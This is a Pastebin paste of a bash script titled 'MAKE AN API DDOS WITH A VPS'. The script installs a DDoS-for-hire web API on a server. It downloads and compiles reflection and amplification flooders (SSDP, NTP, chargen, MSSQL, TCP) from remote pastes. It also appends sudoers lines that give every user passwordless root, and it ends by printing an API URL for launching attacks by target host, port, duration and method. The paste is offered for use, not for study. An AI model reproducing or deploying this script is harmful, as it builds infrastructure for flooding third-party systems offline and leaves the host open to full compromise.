id_Warzax

MAKE AN API DDOS WITH A VPS

Aug 4th, 2017
29,428
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.28 KB | None | 0 0
  1. #!/bin/sh
  2. #    Reuploaded by warzax
  3. sudo apt-get update
  4. sudo apt-get -y install php5 php5-cgi lighttpd screen libpcap-dev gcc dstat unzip nload wget
  5. echo 'www-data ALL=(ALL) ALL' >> /etc/sudoers
  6. echo 'ALL ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
  7. mkdir /var/www/api/ && cd /var/www/api/
  8. wget -q http://pastebin.com/raw/njmk3mF1 -O index.php
  9. echo 'simplekey' >keys.txt
  10. echo "Installing Scripts..."
  11. mkdir /var/www/api/scripts/ && mkdir /var/www/api/amps/ && cd /var/www/api/scripts/
  12. wget -q http://pastebin.com/raw/vpbXuKVA -O ssdp.c && gcc -o ssdp ssdp.c -pthread
  13. wget -q http://pastebin.com/raw/fcyCGWqw -O ntp.c && gcc -o ntp ntp.c -pthread
  14. wget -q http://pastebin.com/raw/Kktvq2pz -O chargen.c && gcc -o chargen chargen.c -pthread
  15. wget -q http://pastebin.com/raw/RsYN9wYs -O mssql.c && gcc -o mssql mssql.c -pthread
  16. wget -q http://pastebin.com/raw/zGVUysHm -O tcp.c && gcc -o tcp tcp.c -pthread
  17. wget -q http://pastebin.com/raw/dR2pEeiq -O dominate.c && gcc -o dominate dominate.c -pthread
  18. rm -rf *.c && cd
  19. sudo lighttpd-enable-mod fastcgi fastcgi-php
  20. sudo service lighttpd force-reload && clear
  21. echo "-------------"
  22. echo "  All done.  "
  23. echo "-------------"
  24. echo "  API: http://YOUR_HOST_IP/api/?key=simplekey&host=[$host]&port=[$host]&time=[$time]&method=[$method]"
  25. echo "-------------"
Advertisement
Add Comment
Please, Sign In to add comment